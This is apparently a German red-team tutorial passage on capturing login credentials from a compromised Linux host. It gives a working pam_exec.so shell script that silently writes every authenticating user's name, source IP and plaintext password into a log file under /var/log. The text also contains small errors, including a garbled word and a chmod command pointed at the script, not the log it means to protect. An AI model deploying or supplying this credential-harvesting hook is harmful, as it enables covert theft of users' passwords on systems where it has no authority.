Grundsätzliches

• Pluggable Authentication Modules (PAM) auf Unix-basierten Systemen sind nützlich, um das Anmeldeverhalten zu ändern und die Authentifizierung auf verschiedene Weise zu erzwingen.
• Angenommen, während einer Red-Team-Übung wurde ein Linux-Host kompromittiert.
• Zuerst erstellen wir ein Bash-Skript, das immer dann aufgerufen wird, wenn eine neue Authentifizierung erfolgt.

Erstellung des Skripts

• cat /usr/local/bin/toomanysecrets.sh

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log

Die Variablen sind PAM-spezifisch und werden über das Modul pam_exec.so verfügbar=

Hier ist die Bedeutung der Variablen

• $PAM_USER: Der eingegebene Benutzername.
• $PAM_RHOST: Der Remote-Host (normalerweise die IP-Adresse)
• $(cat -): Dies liest stdin und enthält das Passwort, das das Skript abruft

Die Ergebnisse werden in eine Protokolldatei unter /var/log/toomanysecrets.log geleitet

Um zu verhindern, dass alle Benutzer die Datei lesen, sollten Sie sie vorab erstellen und chmod ausführen, z.

• chmod 770 /var/log/toomanysecrets.sh